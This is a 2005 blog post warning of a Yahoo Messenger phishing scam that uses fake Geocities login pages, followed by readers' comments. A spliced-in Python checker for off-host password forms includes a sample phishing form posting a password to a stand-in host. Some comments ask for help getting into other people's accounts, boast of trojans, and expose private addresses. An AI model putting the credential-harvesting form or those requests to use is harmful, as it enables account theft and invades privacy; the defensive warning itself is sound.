 

zigzackly's omnium-gatherum *

Quid quid latine dictum sit, altum videtur




Sunday, October 30, 2005
Yahoo password hack warning 

Actually, make that:

Yahoo Messenger password scam warning



Note: I have kept the earlier, inaccurate, post title because this post gets a lot of traffic via search and has been linked to here and there, so I don't want to change the permalink. Though I hope the subhead in larger type makes things clearer.

It happens via Yahoo messenger.

You get a message, apparently from someone on your list. So far, I haven't been able to check if it's someone who's fallen for this, and whose account is being used, or a spoofed send.

The message is something along the lines of "see my new pictures." With a Geocities link. When you go to the link, even if you don't know that Geocities is a home page provider and that it was bought over by Yahoo many years ago, you see the reassuring "yahoo" in the URL, a Yahoo logo alongside the Geocities logo, and what looks like a Yahoo photos page that asks you to log in before you can proceed. All the links work, and go to genuine Geocities sign up, Terms and Conditions, Privacy Policies, etc. Except that you don't need a password to view a Geocities page. (Well, yes, you might, if the page owner has locked some pages behind a javascripty thingy or summat, but you won't need to put in your Yahoo password.)

Proof? Just dump in any arbit name and password. It will seem to accept it (if you look quickly at your status bar, you'll see the page sending to another site).

Just a little while ago, I got what looked like a message from a pal. It didn't sound like him in the least, so my antennae were up. (Besides, a friend told me a few days ago she'd just got hit by a password-stealer, so I guess I was a little wary.)

Clicked the link, and it was as I described it above. Here it is: http://www.geocities.com/hot_pretty_belle/

And in case it's not up, here's a screen grab:



I did a little "view source" and here's what the form looks like underneath the hood. (I have the complete page saved, if one of you techwizards wants it. Just get in touch.)

*see update 2 below


(If the code in the image doesn't make sense to you, here's the skinny: when you hit "enter", the page sends your Yahoo ID and password to hot_pretty_belle, or whoever else has set up the page.)

Now that you know, want to have a little fun? Fill in username and password fields with language mama would have washed your mouth out with soap for. And hit enter. hot_pretty_belle (or whoever you next encounter trying this stunt) will get lots of piping hot email.

Be warned. You'll get another page offering you another sign in button. And a Sign Up button, which, on click, gives you a genuine-looking Yahoo sign up page. Just look up at the URL. Too tired to go see that bit of source code now, so will leave it to you tech-adepts.

I'm going to wait a day before reporting this to Yahoo, so go send that hot_pretty_belle your love!

And do pass this on. No, you don't need to credit me. Well, if you insist. I'm a slut for link love.

Update 1

Did a bit of research, and found out what happens if you enter a genuine Yahoo ID and password and click through.

The page records your ID and password, then forwards you to the real Yahoo Photos site. You (: if you hadn't read this :) would have just muttered imprecations about the dorkiness of the pal who didn't give you proper links.

And a few minutes later, you would have got a message from Y!M saying "You have been signed off Yahoo because you signed in from another location."

This has been happening quite often, so there's not much point remembering specific URLs, like hot_pretty_belle. Just remember the method.
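The method described above, written as a check a defender could script. This is an added example, not the code from the saved page; the `login.yahoo.com` allow-list, the sample URLs and the sample markup are constructed assumptions. It flags a password form on any page outside the login host and any form whose action leaves the page's host, and it goes slightly beyond the post by noting when a script writes markup at run time, since such a form is invisible in the static source.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption for this example: the only host allowed to ask for the password.
LOGIN_HOSTS = {"login.yahoo.com"}


def is_login_host(host):
    """Exact match only, so look-alike names containing 'yahoo' fail."""
    return host.lower().rstrip(".") in LOGIN_HOSTS


class FormCollector(HTMLParser):
    """Record each <form>, its action, and the types of the inputs inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.runtime_markup = False  # a script builds HTML with document.write
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "types": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["types"].append((a.get("type") or "text").lower())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and "document.write" in data:
            self.runtime_markup = True


def audit_page(page_url, html):
    """Return password forms that should not be trusted, with the reasons."""
    collector = FormCollector()
    collector.feed(html)
    collector.close()
    page_host = (urlsplit(page_url).hostname or "").lower()
    findings = []
    for form in collector.forms:
        if "password" not in form["types"]:
            continue
        # An empty or relative action resolves against the page itself.
        target = urlsplit(urljoin(page_url, form["action"]))
        target_host = (target.hostname or "").lower()
        reasons = []
        if not is_login_host(page_host):
            reasons.append("password requested outside the login host")
        if target_host != page_host:
            reasons.append("form submits to another host")
        if reasons:
            findings.append({"target_host": target_host, "reasons": reasons})
    return {"findings": findings, "runtime_markup": collector.runtime_markup}


# Constructed sample pages, not the saved page from the post.
PHISH_URL = "http://www.geocities.com/constructed_sample/"
PHISH_HTML = """<form method="post" action="http://formmailer.example/send">
<input name="login"><input type="password" name="passwd">
<input type="submit" value="Sign In"></form>"""
WRAPPED_HTML = '<script>document.write(unescape("%3Cform%3E"));</script>'

if __name__ == "__main__":
    print(audit_page(PHISH_URL, PHISH_HTML))
    print(audit_page(PHISH_URL, WRAPPED_HTML))
```

A page that reports `runtime_markup` with no findings has to be checked after the browser has rendered it, because the static source does not contain the form.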

Update 2

Thanks to ViswaPrabha and Prashanth, who told the doofus - me - that even with angle brackets html-ised to show up on the page, the script would send comments on this post (and possibly blogger ID and password! shudder!) to the black hats who run the page I referred to. So, text removed and replaced with an image, and now it will behave like a normal, harmless blogger page.

I, for once, am glad that no one commented!

Many Thanks, VP and Prashanth.

Update 2 - 9th July 2006
Please see this diary entry at SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System and this entry on the McAfee Avert Labs Blog. The SANS page points out a development that didn't exist when I wrote this post:

"The last interesting thing is related to obfuscation of the HTML. The attacker decided to use a product called HTML Protector. This tool basically just obfuscates HTML code using JavaScript but as a browser needs to be able to parse the HTML code, the unobfuscation function always has to be present, so with some spare time you can easily unobfuscate this."

And the McAfee page points to this discussion on Broadband Reports, which also mentions the encrypted page.

Blogged for thee by @ 2:43 am | 34 Comments | Post a Comment | Link Love? |



34 Noble Readers have commented.

  On Tuesday, 8 November 2005 10:37:00 GMT+5:30, the Hon'ble Anonymous R said...

This was done to me a few months ago. Clever little scam.

Fortunately I was able to contact yahoo and get my username back.


It is a very simple hack. I manipulated the code a little to try to mimic the results. What it does is use a third-party emailer and emails the scammer whatever is put in the username/password field.

When I fell for it, I remember thinking to myself "hmm geocities..that's odd...oh wait they were bought by Yahoo a while back. hehe stupid me"

  On Tuesday, 15 November 2005 01:14:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

I'm wondering on the geocities password stealer can they get your ip even if you've put in something like.....you/suck for the s/n and pass?
Thanks!!!

  On Friday, 2 December 2005 10:16:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Hi Every 1 out there am Nisha here n am in here facing a problem from a guy whoz id is aqqthu@yahoo.com i just need some help from u guys as just to let me know who this person is or by getting his password for me i"ll be very thankful to you as for ur favour if u can please do send me a mail to maria_was_here@yahoo.com

  On Friday, 6 January 2006 21:47:00 GMT+5:30, the Hon'ble Blogger Anjul said...

http://beauty.trap17.net/pics/ is another such link people.. although this time the hacker got clever enough to use php for his dirty work. A friend of mine got her password hacked this way, I'm trying to know the identity of the offender (probably someone from my hostel). If there's any information do comment/shout anywhere on my blog.
Thanks!

  On Tuesday, 7 February 2006 20:18:00 GMT+5:30, the Hon'ble Anonymous Bill said...

Hi, Folks/ I had my Yahoo hacked this way! Very upsetting. Yahoo has not been helpful. If you can help me get my account back, I would be very grateful. Pls email me at colbyut@yahoo.com Thank you.

  On Sunday, 12 February 2006 21:55:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

And yet another scam site! DO NOT use a valid username and password if you want to examine the source code on this page.

http://www.geocities.com/my_crazy_partie_pics/

  On Thursday, 2 March 2006 00:24:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

I too got my Yahoo Id stolen, I have had this id for 7yrs, Yahoo security isn't much help at all. I know they need this info to access your account, but as I said I signed up for my account 7yrs ago never changed the password, now I can't get my account back until I can remember the answer to my secret question. If any one has any ideas on how I can get my Id back please let me know. I always see this person come online with my screen name and they try sending me the same link.

  On Friday, 19 May 2006 21:28:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

This is for those who forgot the answer to their secret question ... Call up yahoo on (408) 349-3300.

They can help you there.. I lost my password that way too,. they changed it for me and gave me the password. I had to verify the birthdate though.. see if that helps.

For those who don't believe the phone number you can get it by searching for Yahoo on google maps.

  On Friday, 11 August 2006 00:38:00 GMT+5:30, the Hon'ble Anonymous Gilson said...

Hey hi my Name is Gilson as iam too the victim of the hacker. So please let me know any other solution than the phone. My yahoo id starboy21century@yahoo.co.in. Thanks in advance i hope you guys can get the solution and give a slap to this Fucking hackers.

Regards,
Gilson

  On Tuesday, 15 August 2006 20:48:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Hi! my name is Vivek. I got my password hacked by some geocities link. Please help me to recover my password. I made this account some 9 yrs back and don't remember the information I gave that time. Please send me suggestions to whooammii26@yahoo.com. Thanks, Vivek

  On Wednesday, 16 August 2006 21:26:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Even same thing happened to me yest. now i cant access my account.
Please help me n let me know how i can get my account again.please mail me on v_lara2001@yahoo.co.uk

  On Friday, 18 August 2006 09:24:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

I am one of the latest hit, the link used nowadays is "http://www.geocities.com/hott_new_pics_for_you28". As per yahoo's site, I should get a alternate id to send the pwd, but I do not get on my screen. Can anybody help, please send suggestions to don_i@india.com

  On Sunday, 20 August 2006 23:40:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Mine was hacked this morning. I checked early in the morning. It was fine. But when I tried now, it's gone. I remember I got such a geocities link in my messenger from a known contact and clicked on it. But that was 2 weeks back. One of my friends on the ym list told me that he's been getting such links from my ym id for the past 2-3 weeks.

  On Wednesday, 23 August 2006 21:27:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

haiii all if u have problem with your yahoo account just call them at : 866-5627219 i just did that, and they asking a couple questions

don't worry if you forgot everything they can help u. no hope if you try to contact them from their email (feedback form) i did that for 2 weeks every 2days, and no answers at all.

now i get my id back :D

  On Friday, 25 August 2006 20:04:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Hi, Thanks for your reply. Could you tell me to which country the number belongs to. Thanks!

  On Sunday, 27 August 2006 14:11:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

hi frds, someone has stolen my yahoo id. i tried my password bt it doesn't work. i forgot my hint answer also. so pls help me to get my password. that yahoo id was very confidential. if anyone knows the solution pls mail me to manofattraction@gmail.com.

  On Friday, 15 September 2006 14:49:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Doggoneit! It just caught me after many years of careful living online. Link from a colleague in YIM! A geocities.com page (a Yahoo! property). Yahoo! Photos login. And the second login. Argh! I immediately dived in and changed my Yahoo! password. Twice. In quick succession. Repeated login / logout seems to confirm that I managed to change my password *before* the scammer nailed my account. But it sure made me nervous. Nervous enough to go change a whole bunch of other username / password combos I use online.

  On Sunday, 8 October 2006 21:33:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

i am not able to access my yahoo messenger id, plz help.
my yahoo id is con_ravi_jeet@yahoo.co.in,

password hacked by someone plzz tell me
how to get
on con_ravijeet@rediffmail.com

  On Tuesday, 10 October 2006 03:29:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

hii all, i'd like to tell you that my password was hacked by that bad page of yahoo photos, and finally i just tried to call the customer care for yahoo.com by phone and they were really so wonderful and patient, here is the phone number from an international phone: (0018665627219), then choose from menu..press number 2..then the next menu number 2 again.. then you will talk to someone from the customer care team. and they will help you and reset your password and send it to your mail. you will get your password believe me. then and tell me all you guys on my mail: mgmgsan81@yahoo.com
i wish all you got your lost passwords.. and good luck dears.

  On Thursday, 12 October 2006 20:22:00 GMT+5:30, the Hon'ble Blogger Buddy said...

My wife's yahoo name was blocked by the phishing scam everyone is talking about. Supposedly, Yahoo will help you get the name back, but really they won't and they don't f'''ing care!

She has had this name for almost 10 years. At the time when she got it, nothing in Yahoo's site said the personal info was going to be confidential.... SO... she used a fake D.O.B. and zip code info. Well, gee,, who would have thought someone would hack her and she would need to have remembered this stuff?

My wife is an adult film actress and she has thousands of fans, many of which talk with her on messenger. She really needs the name back. Yahoo won't help, even though they can just send the changed password to her alternate email address she has had since she opened the account. Also, she has her online status indicator on her official website etc. which also lists the same alternate email address.

I would really like to find someone who would be willing to help us get her chat name back. I know I will have to get her hacked just to get her back into her own chat name, but what else can I do?

Buddy

  On Sunday, 22 October 2006 12:14:00 GMT+5:30, the Hon'ble Anonymous LAB said...

yes yahoo does not care if someone steals your account unless it is a pay account.. is all about the money.. and they aren't all geocities sites.. you can make them like www.photos.yahoo.tk or hell even buy the domain www.photos-yahoo.com i saw a thing asking about if they can get your ip even if u put the wrong info in.. yes they get it isp and ip.. here is example of the email that the sender gets back..

送信元ホスト名: cpe-00-00-4-190.socal.res.rr.com / 00.00.4.190

送信元ブラウザ: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)

送信元URL : http://www.edited.com

login = browneyeddoll007
passwd = XXXXX

ip isp url and pw all edited.. many use these to get so called illegal id's ones that can no longer be made on yahoo ___name___ name-name or with + any other symbols because they can be sold for cash..

  On Friday, 17 November 2006 15:52:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

Hey... I entered into some like that only it was ymail.sytes.com or something and Now i can't access my email... please can someone get it my account back its vveerryy important.. my yahoo id is romania222001

  On Saturday, 18 November 2006 04:53:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

i was receiving numerous im's and im computer phone calls from |||nick_the_nugget||| and another screen name he was using notifying me it was nick_the_nugget (the first part i cannot remember, all i can remember is brunnette_69_2000). i ignored his requests several times, and he said he knew i was online because my ip was active. he then said he was going to "delete something". suddenly my messenger logged out and said i was logged into another computer. i tried to log back in, but my password had been changed. i was also unable to access my account to change the password.

he has been going through my contact list and sending instant messages, phone call messages, and sending emails telling everyone he is going to capture their ids.

a friend on my contact list, saw that my id was lit up, so she thought i was online. she sent an im, and it was the guy who hijacked my account. he told her my account had been "captured", told her he had her ip address, and told her he was going to delete her account.

this guy has also left a voice mail message with another friend of mine telling her i was "chatting with his 13 year old cousin in a chat room", then he went on to say foul things. she said he sounded very young and very creepy.

my mother sent an im to my im, and the guy responded to her via computer phone call in instant messenger. he said his name was nick from atlanta, ga and he hijacked my account. he told her i was "mean to him in a chat room" (which is a lie), and then started cursing at her "f" this "f" that. then he told her he had her ip address. today, she is unable to log into her account.

i have personal (including medical, bills, home address) and company information stored in my yahoo email, and i am afraid he will go further with identity theft.

i would really like to see this got caught and brought to justice. there is no telling how many people's identities and personal information he has stolen.

Here are his online profiles:

http://profiles.yahoo.com/llllnick_the_nuggetllll

http://www.myspace.com/ncfleet

he also has the following yahoo ids:
fleetwood181987
ncfleet18

he has a yahoo 360 account as well.

  On Tuesday, 21 November 2006 02:08:00 GMT+5:30, the Hon'ble Anonymous Claire said...

hi recently my yahoo id was also hacked, and some of my information was changed and i couldn't get to where i could enter my secret answer
so i called yahoo customer care at 1-408-349-1572 and talked to Miranda she was very nice and helpful with her help i was able to get back my account by answering a few questions and telling her what had happened, do not ever click on links in yahoo they are scams to steal your id and password i know this is not good advice if you've already done so as i did..if anyone would like to contact me to see if maybe i can help you may do so at mysterywoman4u@hotmail.com

  On Tuesday, 21 November 2006 11:24:00 GMT+5:30, the Hon'ble Anonymous ___.-UnKnowN-.___ said...

Those geocities and freewebs. ect. links where fake logins... or trojans. wich you simply upload. you send them the link. they open it.. boom. there computer is trojaned.. that would get every password they typed in there messenger.. ahaha. soooooo You did a lil help with those fake logins. but trojans. never will be gone... they will be rescrypted. Try to scan a file? wouldn't work! a few, best ones. are undetechabele!.lol. So yea.. Owner/admin/mod. whoever. can get my ip. report me.. w,e...lol... Why? cuss i didn't harm no one. actually i gave ya bitches advice..lol... and the fake logins. will come alive once again. with a new script. with that new yahoo shit...lol and there is no such thing as yahoo hackers. unless someone controls ur pc with sub-7/optix-pro/pro-rat/ect/ect... LMFAO. this fake logins thing. is not called being "hacked". How old are ya? you guys are like 20-30. yall sound like lil retarded kids. this is nothing... most poeple had use this for illegal names... There are hundreds of this geocity sites...and there's alot of different ways to get ur id owned.. this gay sites.. trojan.. cracked... info cracked... exploited... and way more waysss.. yes i learn this new trick lesss then a weak ago.. amazing how LimeWire.. BearShare... all those nice programs can help you get passwords..lol... But yeaa....... Amazin how am only 14 years old? and i know alot moreee then ya old poeple. ..lol.. God Bless You!.
__
I am the magnificent rascal
_
I am sexy. bitch!.
_
lol.....

  On Wednesday, 22 November 2006 19:16:00 GMT+5:30, the Hon'ble Blogger Dancing Budhha said...

Can someone help me. It happened to me a day before yesterday. I logged in to YM and saw this thing "see my latest pictures". I clicked and did the same mistake as mentioned. Now, I have not been able to access my own yahoo account since morning jbareria@yahoo.com. I also maintain my own website: www.geocities.com/jbareria Now, my yahoo account doesn't work. Please help, unfortunately I am not able to recollect what all info I gave when I registered 7 years ago thus there is no way I can get my password back. Could someone suggest some option.. Please help, I can't afford to lose all my personal info stored at yahoo for last 7 years.

-Jyotirmay Bareria
jbareria@motorola.com

  On Thursday, 23 November 2006 10:50:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

I have also fallen victim to the above mentioned happenings. I lost my yahoo Id. which i found out is actually worth money because I signed up 7 years ago before they had the _ rule. my id is/was _The_Pawn If anybody knows of a way or can help e-mail me @ jkgreve@earthlink.net. tia

  On Thursday, 25 January 2007 11:41:00 GMT+5:30, the Hon'ble Blogger Optikal said...

I think anyone signing into a geocities site with their yahoo ID's are asking for problems. Do not accept files from people you don't know. Do not log into anything using your main yahoo ID. Only log into yahoo using your yahoo ID. If somehow you slipped and now have lost your ID, ask yahoo for it back - Provide enough information about your ID ie how often you use the account, who is on the friends list and so on.. They will give it back to you despite the fact the attacker has changed your account information.

  On Monday, 5 February 2007 20:03:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

My yahoo account hacked and My password has been changed. plz help me to get the passwords so that i can change it back and details. My IDs are duraygo1@yahoo.com, which i have signed up for a very long time ago, in the messenger some of the people there are, luvmenow_2001@yahoo.com, luvmenow@yahoo.com. please you can send the password to owoyemi_deji@yahoo.com if you get it please.

  On Tuesday, 13 March 2007 20:51:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

plz help me to recover my password of nehaa75@yahoo.com and plz send me at wess42@hotmail.com

  On Friday, 16 March 2007 09:20:00 GMT+5:30, the Hon'ble Blogger Neeci said...

Funny enough my Yahoo account got hacked. I had to start going to every site that had my yahoo address and change them all. Creepy, very creepy.

  On Tuesday, 27 March 2007 19:56:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

the web is not meant for dummies

  On Tuesday, 12 June 2007 01:53:00 GMT+5:30, the Hon'ble Anonymous annerose said...

These comments have been invaluable to me as is this whole site. I thank you for your comment.

  On Thursday, 13 September 2007 00:35:00 GMT+5:30, the Hon'ble Anonymous Anonymous said...

quite often when I start to log off I get a message saying I am logged on at a remote computer, and shutting down will close that connection as well, I didn't realize was what was happening. I think I know who is doing it, and I did know that persons yahoo password, now it has been changed and I found out today mine had been hacked in to. I sure would like to check his, to see what he has taken from mine, but I don't know how to do the technical stuff. We got to be careful.



Creative Commons License
This work is licensed under a
Creative Commons License.